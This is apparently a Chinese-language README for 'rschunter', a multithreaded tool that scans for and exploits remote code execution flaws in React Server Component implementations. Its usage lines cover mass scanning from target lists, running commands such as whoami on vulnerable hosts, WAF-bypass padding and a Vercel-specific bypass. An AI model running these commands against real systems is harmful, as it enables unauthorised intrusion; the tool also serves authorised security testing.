一个强大的、多线程的扫描与利用工具,用于检测 React Server Component (RSC) 漏洞。该工具旨在识别和利用 RSC 实现中的 RCE 漏洞,支持多种绕过技术和策略。
注意:由于维护完整的交互式 shell 和其他重型特性的工作量巨大,我们决定移除它们。本项目现在严格专注于边缘情况处理、行为分析以及 RSC 漏洞的可靠检测。我们相信一个更简单、更专注的工具能更好地服务社区。
pip install requests
扫描单个 URL 以检查漏洞。
python3 rschunter.py -u https://example.com
从文件中扫描 URL 列表(每行一个 URL)。
python3 rschunter.py -l targets.txt
在易受攻击的目标上执行特定命令(默认为 id)。
python3 rschunter.py -u https://example.com -c "whoami"
将易受攻击的主机列表保存到 CSV 文件。
python3 rschunter.py -l targets.txt --save vulnerable.csv
启用垃圾数据注入以绕过 WAF。
python3 rschunter.py -u https://example.com --waf-bypass
启用针对 Vercel 的特定绕过策略。
python3 rschunter.py -u https://example.com --vercel
通过代理路由流量(对使用 Burp Suite 调试非常有用)。
python3 rschunter.py -u https://example.com --proxy http://127.0.0.1:8080
本工具仅用于教育和授权测试。未经双方事先同意,使用本工具攻击目标是非法的。开发者不承担任何责任,也不对因使用本程序造成的任何误用或损害负责。
| 参数 | 描述 |
|---|
-u, --url | 目标 URL。 |
-l, --list | 包含目标列表的文件路径。 |
-c, --cmd | 要执行的命令(默认:id)。 |
-t, --threads | 并发线程数(默认:10)。 |
--check | 安全模式:检查漏洞而不执行自定义命令。 |
--waf-bypass-size | 垃圾数据大小(KB)(默认:128)。 |
-v, --verbose | 启用详细输出用于调试。 |